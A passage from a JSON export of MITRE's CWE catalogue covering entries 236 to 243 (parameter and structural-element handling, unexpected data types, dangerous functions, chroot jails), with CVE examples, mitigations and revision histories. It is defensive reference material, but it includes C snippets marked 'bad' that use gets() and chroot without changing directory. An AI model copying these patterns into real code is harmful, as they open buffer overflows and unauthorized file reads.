amount.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"233","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This typically occurs in situations when only one element is expected to be specified."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-1014","Description":"MIE. multiple gateway/security products allow restriction bypass using multiple MIME fields with the same name, which are interpreted differently by clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1014"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Parameter Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"460"}}},"Notes":{"Note":{"#text":"This type of problem has a big role in multiple interpretation vulnerabilities and various HTTP attacks.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Description, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Extra Parameter Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Extra Parameter","attr":{"@_Date":"2009-03-10"}}]}},"236":{"attr":{"@_ID":"236","@_Name":"Improper Handling of Undefined Parameters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a particular parameter, field, or argument name is not defined or supported by the product.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"233","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1488","Description":"Crash in IRC client via PART message from a channel the user is not in.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1488"},{"Reference":"CVE-2001-0650","Description":"Router crash or bad route modification using BGP updates with invalid transitive attribute.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0650"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Undefined Parameter Error"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Undefined Parameter Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Undefined Parameter","attr":{"@_Date":"2009-03-10"}}]}},"237":{"attr":{"@_ID":"237","@_Name":"Improper Handling of Structural Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not handle or incorrectly handles inputs that are related to complex structures.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Element Problems"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Element Problems","attr":{"@_Date":"2009-03-10"}}}},"238":{"attr":{"@_ID":"238","@_Name":"Improper Handling of Incomplete Structural Elements","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a particular structural element is not completely specified.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"237","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Element Error"}},"Notes":{"Note":{"#text":"Can be primary to other problems.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Missing Element Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Missing Element","attr":{"@_Date":"2009-03-10"}}]}},"239":{"attr":{"@_ID":"239","@_Name":"Failure to Handle Incomplete Element","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when a particular element is not completely specified.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"237","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"404","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1532","Description":"HTTP GET without \\\\r\\\\n\\\\r\\\\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1532"},{"Reference":"CVE-2003-0195","Description":"Partial request is not timed out.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0195"},{"Reference":"CVE-2005-2526","Description":"MFV. CPU exhaustion in printer via partial printing request then early termination of connection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2526"},{"Reference":"CVE-2002-1906","Description":"CPU consumption by sending incomplete HTTP requests and leaving the connections open.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1906"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Element"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Incomplete Element","attr":{"@_Date":"2008-04-11"}}}},"240":{"attr":{"@_ID":"240","@_Name":"Improper Handling of Inconsistent Structural Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when two or more structural elements should be consistent, but are not.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"237","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Inconsistent Elements"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Inconsistent Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Inconsistent Elements","attr":{"@_Date":"2009-03-10"}}]}},"241":{"attr":{"@_ID":"241","@_Name":"Improper Handling of Unexpected Data Type","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not handle or incorrectly handles when a particular element is not the expected type, e.g. it expects a digit (0-9) but is provided with a letter (A-Z).","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"228","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1156","Description":"FTP server crash via PORT command with non-numeric character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1156"},{"Reference":"CVE-2004-0270","Description":"Anti-virus product has assert error when line length is non-numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0270"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Wrong Data Type"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO37-C","Entry_Name":"Do not assume that fgets() or fgetws() returns a nonempty string when successful","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"48"}}},"Notes":{"Note":{"#text":"Probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Wrong Data Type","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Wrong Data Type","attr":{"@_Date":"2009-03-10"}}]}},"242":{"attr":{"@_ID":"242","@_Name":"Use of Inherently Dangerous Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program calls a function that can never be guaranteed to work safely.","Extended_Description":"Certain functions behave in dangerous ways regardless of how they are used. Functions in this category were often implemented without taking security concerns into account. The gets() function is unsafe because it does not perform bounds checking on the size of its input. An attacker can easily send arbitrarily-sized input to gets() and overflow the destination buffer. Similarly, the &gt;&gt; operator is unsafe to use when reading into a statically-allocated character array because it does not perform bounds checking on the size of its input. An attacker can easily send arbitrarily-sized input to the &gt;&gt; operator and overflow the destination buffer.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1177","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Requirements"],"Description":"Ban the use of dangerous functions. Use their safe equivalent."},{"Phase":"Testing","Description":"Use grep or static analysis tools to spot usage of dangerous functions."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The code below calls gets() to read information into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[BUFSIZE];gets(buf);","xhtml:br":""}},"Body_Text":"The gets() function in C is inherently unsafe."},{"attr":{"@_Demonstrative_Example_ID":"DX-5"},"Intro_Text":"The code below calls the gets() function to read in data from the command line.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"}","xhtml:div":{"#text":"char buf[24];printf(\\"Please enter your name and press &lt;Enter&gt;\\\\n\\");gets(buf);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Dangerous Functions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS33-C","Entry_Name":"Do not use vfork()","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-194","@_Section":"Chapter 5. Working with I/O"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;gets and fgets&#34; Page 163"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Dangerous Functions","attr":{"@_Date":"2008-01-30"}},{"#text":"Use of Inherently Dangerous Functions","attr":{"@_Date":"2008-04-11"}}]}},"243":{"attr":{"@_ID":"243","@_Name":"Creation of chroot Jail Without Changing Working Directory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail.","Extended_Description":"Improper use of chroot() may allow attackers to escape from the chroot jail. The chroot() function call does not change the process\'s current working directory, so relative paths may still refer to file system resources outside of the chroot jail after chroot() has been called.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"Unix","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"The chroot() system call allows a process to change its perception of the root directory of the file system. After properly invoking chroot(), a process cannot access any files outside the directory tree defined by the new root directory. Such an environment is called a chroot jail and is commonly used to prevent the possibility that a processes could be subverted and used to access unauthorized files. For instance, many FTP servers run in chroot jails to prevent an attacker who discovers a new vulnerability in the server from being able to download the password file or other sensitive files on the system."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Files or Directories"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the following source code from a (hypothetical) FTP server:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(\\"/var/ftproot\\");...fgets(filename, sizeof(filename), network);localfile = fopen(filename, \\"r\\");while ((len = fread(buf, 1, sizeof(buf), localfile)) != EOF) {}fclose(localfile);","xhtml:br":["","","","",""],"xhtml:div":{"#text":"fwrite(buf, 1, sizeof(buf), network);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"This code is responsible for reading a filename from the network, opening the corresponding file on the local machine, and sending the contents over the network. This code could be used 